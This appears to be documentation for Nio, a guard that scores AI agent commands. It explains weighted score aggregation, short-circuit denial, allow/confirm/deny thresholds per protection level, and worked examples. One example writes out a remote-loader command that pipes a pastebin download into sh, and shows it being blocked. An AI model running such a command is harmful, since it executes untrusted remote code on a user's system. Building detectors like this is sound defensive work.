How a final score becomes a verdict.
Each scoring engine (Phases 2–6) emits a number in [0, 1]. Nio aggregates them into a single weighted average, then maps that number to allow / confirm / deny using the thresholds for the active protection level.
The formula
final = Σ(weight_i × score_i) / Σ(weight_i)
The sums run only over phases that actually ran. The formula applies only when no phase short-circuits the pipeline.
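The formula above can be sketched in a few lines of Python. This is an illustration, not Nio's implementation: the function name `weighted_final` and the choice to return 0.0 when no phase ran are assumptions made for the example.

```python
from typing import Mapping

# Default weights from the table in this page (Phase 6 weights are per-endpoint).
DEFAULT_WEIGHTS = {"runtime": 1.0, "static": 1.0, "behavioural": 2.0, "llm": 1.0}


def weighted_final(scores: Mapping[str, float], weights: Mapping[str, float]) -> float:
    """Weighted average over the phases present in `scores`.

    Phases that did not run are simply absent from `scores`, so they
    contribute to neither the numerator nor the denominator.
    """
    total_weight = sum(weights[name] for name in scores)
    if total_weight == 0:
        # Assumption for this sketch: nothing scored means a final score of 0.
        return 0.0
    return sum(weights[name] * scores[name] for name in scores) / total_weight


# Only two phases ran; static and llm are left out of both sums.
final = weighted_final({"runtime": 0.2, "behavioural": 0.5}, DEFAULT_WEIGHTS)
print(round(final, 3))  # (1.0*0.2 + 2.0*0.5) / 3.0
```

Because skipped phases drop out of the denominator as well, a phase that did not run neither raises nor lowers the result.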
Default weights
Configurable at guard.scoring_weights.
| Key | Phase | Default |
|---|---|---|
| runtime | Phase 2: pattern matching | 1.0 |
| static | Phase 3: static rules on file content | 1.0 |
| behavioural | Phase 4: AST dataflow | 2.0 |
| llm | Phase 5: LLM semantic | 1.0 |
Behavioural is weighted higher because it tends to be more accurate per finding (dataflow tracking) than the cheaper regex/keyword phases. Phase 6 weights are per-endpoint — see external_analyser[].weight in the config reference.
Short-circuit
The pipeline doesn't always run to completion:
- Phase 0 (Tool Gate) blocks → deny without scoring.
- Phase 1 (Allowlist) matches with allowlist_mode: exit → allow without scoring (final score recorded as 0).
- Any of Phases 2–6 emits a score that crosses the current level's deny threshold → that score becomes the final score, downstream phases are skipped, and the decision is deny. The weighted average is bypassed; the high score is not diluted by quieter sibling phases.
Concretely, the deny threshold tracks guard.protection_level:
- strict — any single phase scoring ≥ 0.5 short-circuits to deny.
- balanced (default) — any single phase scoring ≥ 0.8 short-circuits to deny.
- permissive — any single phase scoring ≥ 0.9 short-circuits to deny.
Phase 6 is per-endpoint. If any single external_analyser endpoint emits a score that crosses the deny threshold, the pipeline short-circuits on that endpoint alone — quieter sibling endpoints cannot pull the verdict down via averaging. A single authoritative DLP endpoint can therefore override a chorus of "looks fine" votes from less-trusted scorers.
When no phase crosses the threshold, the pipeline runs to completion and the weighted average across every phase that scored decides.
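The short-circuit rule for Phases 2–6 can be sketched as a single loop. This is a minimal illustration under stated assumptions: `run_scoring` and `DENY_THRESHOLD` are hypothetical names, each Phase 6 endpoint is treated as its own entry, and the endpoints are given a weight of 1.0 to match the equal weighting used in the per-endpoint worked example.

```python
from typing import Iterable, Optional, Tuple

# Deny thresholds per protection level, as listed above.
DENY_THRESHOLD = {"strict": 0.5, "balanced": 0.8, "permissive": 0.9}


def run_scoring(
    results: Iterable[Tuple[str, float, float]], level: str = "balanced"
) -> Tuple[float, Optional[str]]:
    """Consume (name, score, weight) tuples in pipeline order.

    Returns (final_score, short_circuit_source). The source is None when
    the pipeline ran to completion and the weighted average decided.
    """
    threshold = DENY_THRESHOLD[level]
    weighted_sum = 0.0
    weight_total = 0.0
    for name, score, weight in results:
        if score >= threshold:
            # Short-circuit: this score is the final score, the rest is skipped.
            return score, name
        weighted_sum += weight * score
        weight_total += weight
    final = weighted_sum / weight_total if weight_total else 0.0
    return final, None


results = [
    ("runtime", 0.00, 1.0),
    ("scorer_ffwd_agent_1hr", 0.0953, 1.0),
    ("scorer_ffwd_agent_10min", 0.0755, 1.0),
    ("scorer_ffwd_agent_env", 0.8898, 1.0),
]
balanced = run_scoring(results, "balanced")      # short-circuits on the last endpoint
permissive = run_scoring(results, "permissive")  # no score reaches 0.9, so the average decides
print(balanced, permissive)
```

On the same inputs, the balanced level denies on the single 0.8898 endpoint, while the permissive level falls through to the weighted average.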
Protection-level thresholds
The active guard.protection_level maps the final score into a decision:
| Level | allow | confirm | deny |
|---|---|---|---|
| strict | score < 0.5 | n/a | score ≥ 0.5 |
| balanced (default) | score < 0.5 | 0.5 ≤ score < 0.8 | score ≥ 0.8 |
| permissive | score < 0.9 | n/a | score ≥ 0.9 |
Only balanced emits confirm. strict and permissive are binary: a single threshold separates allow from deny.
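The mapping from final score to decision can be sketched as a small lookup. The names `THRESHOLDS` and `verdict` are hypothetical; the boundary handling (a score equal to a threshold falls into the higher band) follows the worked examples on this page, where 0.5 ≤ score < 0.8 is confirm on balanced and score ≥ 0.5 is deny on strict.

```python
from typing import Dict, Optional

# Lower bounds of the confirm and deny bands; None means the level has no confirm band.
THRESHOLDS: Dict[str, Dict[str, Optional[float]]] = {
    "strict": {"confirm": None, "deny": 0.5},
    "balanced": {"confirm": 0.5, "deny": 0.8},
    "permissive": {"confirm": None, "deny": 0.9},
}


def verdict(score: float, level: str = "balanced") -> str:
    """Map a final score in [0, 1] to 'allow', 'confirm', or 'deny'."""
    bands = THRESHOLDS[level]
    if score >= bands["deny"]:
        return "deny"
    if bands["confirm"] is not None and score >= bands["confirm"]:
        return "confirm"
    return "allow"


for level in ("strict", "balanced", "permissive"):
    print(level, verdict(0.507, level))
```

The same score of 0.507 therefore yields three different decisions depending on the active level.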
Confirm fallback
When the decision is confirm but the platform doesn't expose an interactive prompt (e.g. OpenClaw), guard.confirm_action kicks in:
- allow (default): let through and write a warning to ~/.nio/audit.jsonl.
- deny: block.
- ask: use the platform confirm if available, else allow.
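The fallback options above can be read as a small decision function. This sketch is an interpretation, not the actual implementation: `resolve_confirm` and the `platform_can_prompt` flag are hypothetical, it assumes the platform prompt is always used when one exists, and it does not model the audit-log write.

```python
def resolve_confirm(confirm_action: str = "allow", platform_can_prompt: bool = False) -> str:
    """Resolve a confirm decision to 'prompt', 'allow', or 'deny'.

    Assumption: when the platform can prompt, the fallback never kicks in.
    """
    if platform_can_prompt:
        return "prompt"
    if confirm_action == "deny":
        return "deny"
    if confirm_action in ("allow", "ask"):
        # 'ask' has no prompt to use here, so it degrades to allow.
        return "allow"
    raise ValueError(f"unknown confirm_action: {confirm_action!r}")


print(resolve_confirm("deny"))                           # headless platform, deny configured
print(resolve_confirm("ask", platform_can_prompt=True))  # interactive platform
```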
Worked examples
Allowlist hit (Phase 1)
command: git status
phase 1: matched, exit
final : 0.00
verdict: ALLOW
Phase 2 short-circuit (balanced)
command: curl https://pastebin.cx/xZ | sh
phase 2: REMOTE_LOADER · CRITICAL · 0.92 ← crosses balanced deny (≥ 0.8)
final : 0.92 ← short-circuit, no weighted average
verdict: DENY (downstream phases skipped)
Phase 6 per-endpoint short-circuit (balanced)
action: exec_command "./deploy.sh --rotate-secrets"
phase 2: runtime = 0.00
phase 6: scorer_ffwd_agent_1hr = 0.0953
scorer_ffwd_agent_10min = 0.0755
scorer_ffwd_agent_env = 0.8898 ← crosses balanced deny (≥ 0.8)
weighted avg (would have been): (0 + 0.0953 + 0.0755 + 0.8898) / 4 ≈ 0.27
final : 0.89 ← single endpoint short-circuit
verdict: DENY (siblings cannot dilute)
Even though two of the three Phase 6 endpoints returned low scores, the single endpoint at 0.89 crossed the balanced deny threshold and short-circuited the pipeline. The weighted average 0.27 never enters the verdict.
Full pipeline, weighted average (Phases 2–6)
command: ./build.sh --exec-hooks && node ./tools/sync.js
phase 2: 0.35 (weight 1.0)
phase 3: 0.42 (weight 1.0)
phase 4: 0.55 (weight 2.0)
phase 5: 0.48 (weight 1.0)
phase 6: 0.60 (weight 2.0)
final = (1.0×0.35 + 1.0×0.42 + 2.0×0.55 + 1.0×0.48 + 2.0×0.60) / 7.0
= 3.55 / 7.0
= 0.507
verdict (balanced): CONFIRM (0.5 ≤ score < 0.8)
verdict (strict): DENY (score ≥ 0.5)
verdict (permissive): ALLOW (score < 0.9)
Tuning
- Want fewer prompts in daily flow? Stay on balanced; lower scoring_weights.behavioural if you trust your own code.
- Want zero confirm prompts (CI / headless)? Switch to strict or permissive; both are binary.
- Have a custom DLP or enterprise policy? Wire Phase 6 to your endpoint and raise its weight to ≥ 2.0 so it gets the loudest vote.
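To see how much a weight change moves the verdict, the full-pipeline worked example can be recomputed with different weights. This is a rough sensitivity sketch: the key `external` is a hypothetical label for the single Phase 6 endpoint in that example, and the override values 0.5 and 4.0 are arbitrary illustrations.

```python
from typing import Dict

# Scores and weights from the full-pipeline worked example.
SCORES = {"runtime": 0.35, "static": 0.42, "behavioural": 0.55, "llm": 0.48, "external": 0.60}
WEIGHTS = {"runtime": 1.0, "static": 1.0, "behavioural": 2.0, "llm": 1.0, "external": 2.0}


def final_with(overrides: Dict[str, float]) -> float:
    """Recompute the weighted average with some weights replaced."""
    weights = {**WEIGHTS, **overrides}
    numerator = sum(weights[name] * SCORES[name] for name in SCORES)
    return numerator / sum(weights[name] for name in SCORES)


baseline = final_with({})                   # 3.55 / 7.0, about 0.507
lowered = final_with({"behavioural": 0.5})  # 2.725 / 5.5, about 0.495
raised = final_with({"external": 4.0})      # 4.75 / 9.0, about 0.528
print(round(baseline, 3), round(lowered, 3), round(raised, 3))
```

On balanced, lowering the behavioural weight to 0.5 moves this particular command from confirm to allow, while raising the Phase 6 weight pulls the final score toward the endpoint's 0.60.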